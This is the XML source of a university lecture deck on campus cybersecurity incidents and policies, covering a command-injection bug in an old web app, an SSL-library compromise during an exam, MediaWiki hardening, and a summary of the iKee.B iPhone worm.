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4" r:id="rId2"/>
    <p:sldId id="411" r:id="rId3"/>
    <p:sldId id="412" r:id="rId4"/>
    <p:sldId id="425" r:id="rId5"/>
    <p:sldId id="413" r:id="rId6"/>
    <p:sldId id="414" r:id="rId7"/>
    <p:sldId id="415" r:id="rId8"/>
    <p:sldId id="419" r:id="rId9"/>
    <p:sldId id="416" r:id="rId10"/>
    <p:sldId id="417" r:id="rId11"/>
    <p:sldId id="418" r:id="rId12"/>
    <p:sldId id="420" r:id="rId13"/>
    <p:sldId id="432" r:id="rId14"/>
    <p:sldId id="431" r:id="rId15"/>
    <p:sldId id="421" r:id="rId16"/>
    <p:sldId id="422" r:id="rId17"/>
    <p:sldId id="423" r:id="rId18"/>
    <p:sldId id="424" r:id="rId19"/>
    <p:sldId id="394" r:id="rId20"/>
    <p:sldId id="427" r:id="rId21"/>
    <p:sldId id="426" r:id="rId22"/>
    <p:sldId id="428" r:id="rId23"/>
    <p:sldId id="430" r:id="rId24"/>
    <p:sldId id="429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algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="85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egoe" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="85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egoe" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="85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egoe" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="85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egoe" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="85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ego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ego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ego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ego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ego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99"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="66FFFF"/>
    <a:srgbClr val="FF99CC"/>
    <a:srgbClr val="FF0000"/>
    <a:srgbClr val="FFFF99"/>
    <a:srgbClr val="08F81F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7" autoAdjust="0"/>
    <p:restoredTop sz="84615" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-792" y="-492"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="144"/>
        <p:guide orient="horz" pos="4176"/>
        <p:guide orient="horz" pos="893"/>
        <p:guide orient="horz" pos="1200"/>
        <p:guide orient="horz" pos="1492"/>
        <p:guide orient="horz" pos="2764"/>
        <p:guide pos="240"/>
        <p:guide pos="5627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114" y="7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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200" b="1">
                <a:effectLst/>
                <a:latin typeface="Segoe Semibold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000">
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7C4A02B3-7D28-4283-AD1B-2157CF231E57}" type="datetime8">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>8/15/2011 11:11 AM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63230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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="800">
                <a:effectLst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4925" y="8831263"/>
            <a:ext cx="625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200" b="1">
                <a:effectLst/>
                <a:latin typeface="Segoe Semibold" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{DD457B1D-73F8-4A6E-8DBB-BAB367E17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03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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>8/15/2011 11:11 AM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57927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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="800">
                <a:effectLst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07063" y="8829675"/>
            <a:ext cx="1301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fld id="{E9516E1B-70A2-475D-87CB-BD13E0E58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01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gital.com/justiceleague/2011/06/15/cloud-security-panel-at-nist-and-informit-reac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nformit.com/articles/article.aspx?p=172776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webappsec.org/w/page/13246989/Web%20Application%20Security%20Statistic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uccs.edu/~cs691/studentproj/projM2011/eashary/doc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Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> examples and insights for cyber security incidents.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Think how you handle them and what are related security policies in place or needed.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Discuss some recent projects and their potential impact on campus security procedures/policies.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A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/15/2011 11:11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16E1B-70A2-475D-87CB-BD13E0E584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know cloud computing infrastructure are not compromised?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cigital.com/justiceleague/2011/06/15/cloud-security-panel-at-nist-and-informit-reaction/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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/>
              </a:rPr>
              <a:t>Partly Cloudy with a Chance of Security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 Gary McGraw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cigital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Steve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Lipner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of Microsoft, JC Moses of Amazon, Jonathan Smith of Penn, and Jeremy Epstein of SRI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Gary said the price competition will drive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feature to be minimum backbone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without security.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My class disagree. What do you think?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A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/15/2011 11:11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16E1B-70A2-475D-87CB-BD13E0E584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7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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> our system/net admin are very responsive and accommodating.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> I run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> web application on our server?  Can it share the same NFS directory as the main CS production server?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Can I teach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> server site scripts on our lab servers and allow remote access from home.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Like to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mediawiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to share class resource and info.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Only recent new hire faculty members receive rigorous cyber security training.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A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/15/2011 11:11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16E1B-70A2-475D-87CB-BD13E0E584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8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followed the format of the famous paper “Smashing The Stack for Fun and profit,” by Aleph One (aka Elias Levy) https://athena.uccs.edu/ictf/images/b/bc/Hacking_the_Midterm_rev2.ppt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>I have used the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0"/>
              <a:t> script for 13 years!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A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/15/2011 11:11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16E1B-70A2-475D-87CB-BD13E0E584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9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called Command Line Injection!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Created and used 1995. a pioneer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> web app effort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other logic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> error. Should check the login/password first before allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir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Replace system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) with more specific function calls.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A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/15/2011 11:11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16E1B-70A2-475D-87CB-BD13E0E584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1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Rats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> cover c, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>c++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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, python. Mike added extension to Ruby.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://projects.webappsec.org/w/page/13246989/Web%20Application%20Security%20Statistics</a:t>
            </a:r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statistics includes data about 12186 web applications with 97554 detected vulnerabilities of different risk levels.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deadline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sins of software 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A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/15/2011 11:11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16E1B-70A2-475D-87CB-BD13E0E584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handle this after the exam. How to notify users, how to make sure no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> being planted in user home directories?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A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/15/2011 11:11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16E1B-70A2-475D-87CB-BD13E0E584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2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6732E2BF-A78C-44E6-A431-7A5A921011EB}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" i="0"/>
              <a:pPr algn="r"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" i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http://cs.uccs.edu/~cs691/studentproj/projM2011/eashary/doc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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20E64338-5B25-4603-95A7-C15349778891}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" i="0"/>
              <a:pPr algn="r"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" i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 with progressive data center 170,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sqrt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (IBM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storagetec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> drive).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A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/15/2011 11:11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16E1B-70A2-475D-87CB-BD13E0E584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ribb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-33338" y="2039938"/>
            <a:ext cx="9177338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0" y="3049588"/>
            <a:ext cx="6696075" cy="585787"/>
          </a:xfrm>
          <a:ln algn="ctr"/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000" y="4387850"/>
            <a:ext cx="6642100" cy="420688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1706A-4D04-45E8-AAE1-68E18DC48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00025"/>
            <a:ext cx="2101850" cy="284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00025"/>
            <a:ext cx="6156325" cy="284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75CC0-CC52-4131-A982-6E7DD1FCF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103313"/>
            <a:ext cx="8410575" cy="19415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55A53-BBC2-485C-B98D-EBC94910F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03313"/>
            <a:ext cx="4129088" cy="1941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103313"/>
            <a:ext cx="4129087" cy="1941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58B69-A1BA-435D-82B7-FEF291515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03ED4-55E6-486A-B9BC-29A44110F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AE079-BD98-4BB0-A2C2-078A01128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03313"/>
            <a:ext cx="4129088" cy="194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103313"/>
            <a:ext cx="4129087" cy="194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9E101-E78C-4CBA-81A9-05047ED8A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1D9DD-99DB-48F0-B2EE-36E0A4B77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E0793-3E8D-4549-B5DB-0E30B928D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C420C-5541-49B8-9184-0EF535A17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DA43D-B8A3-4619-A78F-63701B31C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0EB6A-4163-48B1-B592-519A4117B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0025"/>
            <a:ext cx="838200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001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03313"/>
            <a:ext cx="841057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hoto Editor Photo" r:id="rId17" imgW="1647619" imgH="1600000" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId17" imgW="1647619" imgH="16000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5" y="0"/>
                        <a:ext cx="12985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7E99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1" i="1" smtClean="0"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 b="1" i="1" smtClean="0"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 i="1">
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{51289606-D701-416F-AE77-1BE5BE8E151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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="461963" indent="-4619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9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50900" indent="-387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7300" indent="-4048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55763" indent="-3968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2638" indent="-395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098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20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670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20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42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20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14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20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boxgrinder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csb.edu/~vig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yue@uccs.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"/>
            <a:ext cx="9144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0223" cy="119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WORK\EAS\program\colleg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52" y="1"/>
            <a:ext cx="1452423" cy="1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WORK\EAS\program\se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423460"/>
            <a:ext cx="1717675" cy="11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64053"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="90890" y="1134707"/>
          <a:ext cx="1474221" cy="143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hoto Editor Photo" r:id="rId7" imgW="1647619" imgH="1600000" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId7" imgW="1647619" imgH="1600000" progId="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90" y="1134707"/>
                        <a:ext cx="1474221" cy="1431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55600" y="3295650"/>
            <a:ext cx="8343900" cy="3000821"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Security Issues in My Academic Playground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3200" dirty="0" smtClean="0"/>
              <a:t>Edward Chow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Department of Computer Science</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>University of Colorado at Colorado Springs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820972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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mediawiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or PHP Hacks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4745915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set a policy to forbid the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mediawiki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smtClean="0"/>
              <a:t>No, please not right now</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Be diligent in patching/porting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mediawiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  Let me know if you know a fast method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Put them behind campus firewall.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make sure to limit file types for upload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ighten accesses by only allowing email confirmed users to have accesses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User other tools: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sharepoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> doc,…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868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2086725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSL Security Breach while online final </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is 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38313"/>
            <a:ext cx="8410575" cy="4487382"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To save a few trees, 2006 final was in the computer lab with access to all course material.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A few minutes into the exam, Jim rushed in and said “Dr. Chow, the server log shows the login and password of all student accounts.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jim observed brute force tries on root password for cs.uccs.edu quite sometime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Look like the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>openssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> library was replaced.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What would you do in this case? Stop final, let go home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99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659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978729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UCCSClassApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Towards A better CMS for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iPad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Client and Smart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1154113"/>
            <a:ext cx="8410575" cy="2686889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Project goal: develop an easy to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ipad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> app and portal. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Investigate how to harden a portal (studentfootprint.com).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Involve a company called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>niVolve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Portal being developed using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Inivolve’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>PortalFramework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Zend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> Guard to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encode/obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t> scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>against unlicensed use and reverse engineering.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Greg to perform penetration testing when it is ready!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Appcelerator.com’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> Titanium for cross-platform development.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193799"/>
            <a:ext cx="2054243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3365500"/>
            <a:ext cx="685214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cchow\Pictures\gnomeTradem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43" y="4626642"/>
            <a:ext cx="1205211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96121" y="3389313"/>
            <a:ext cx="23749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What is wrong with the above </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>studentfootprint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> logo?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21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 txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="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27651" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1447800"/>
            <a:ext cx="495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b="0" dirty="0" smtClean="0"/>
              <a:t>An analysis of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>iKee.B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t> (duh)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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7086600" cy="576157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In early November 2009, Dutch users of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>jailbroken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> iPhones in T-Mobile's 3G IP range began experiencing extortion popup windows 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Char char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Jailbroken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> iPhones have been configured with a secure shell (SSH) network service with a known default root password of 'alpine'.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2000" dirty="0" smtClean="0"/>
              <a:t>around the week of 8 November, a second iPhone malware outbreak began in Australia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>convert the iPhone into a self-propagating worm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Char char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>It succeeded in infecting an estimated 21,000 victims within about a week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Char char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
